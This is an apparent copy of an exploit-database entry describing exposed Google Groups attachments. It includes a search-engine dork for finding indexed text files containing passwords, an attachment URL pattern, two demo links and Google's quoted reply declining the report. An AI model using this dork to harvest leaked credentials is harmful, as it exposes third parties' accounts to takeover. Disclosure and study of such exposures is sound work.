Google Groups - Public File Disclosure (Sensitive Info)

CVE: N/A
Category: CWE-200
Price: N/A
Severity: High
Author: N/A
Risk: Critical
Exploitation Type: Remote
Date: 2020-12-09
CPE: cpe:cpe:/o:google:google_chrome
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120060

Below is a copy:

Google Groups - Public File Disclosure (Sensitive Info)
#############################################################
# Exploit Title: Google Groups - Public File Disclosure (Sensitive Info)
# Google Dork: site:googlegroups.com ext:txt "password:"
# Date: 2020-12-09
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: groups.google.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.9.0-kali2-686-pae #1 SMP Debian 5.9.6-1kali1 (2020-11-11) i686 GNU/Linux

#############################################################
[*] Vuln Info:
==============
Google confirmed that this was an index configuration error which resulted in the leakage of files containing sensitive information such as usernames, passwords, server log records, etc., but Google considers this to be out of scope, as in report issue #174821762.

Google said:
"Thanks for your input. We think the issue might not be severe enough for us to track it as an abuse risk.
When we file an abuse risk bug to product teams, we impose monitoring and escalation processes for teams to follow, and the abuse risk described in this report does not meet the threshold that we would usually require for this type of escalations on behalf of our team.
To provide feedback about our products, you can also use our Google Product Forums, where you can share your feedback with other users and our product team.
That said - if you think we misunderstood your report, and you see a well defined abuse risk, please let us know what we missed.
Regards,
Singh, Google Trust & Safety"

#############################################################
[*] Exploit:
============
/group/[GroupName]/attach/[UniqueCode]/[FileName.ext]

#############################################################
[*] Demo:
=========
https://0758a63b-a-62cb3a1a-s-sites.googlegroups.com/site/eduvinasco/assignments/actividadincapprogramacion/Instrucciones.txt

https://googlegroups.com/a/onosproject.org/group/onos-discuss/attach/209bc307d6be17/PingallExample.txt

#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1
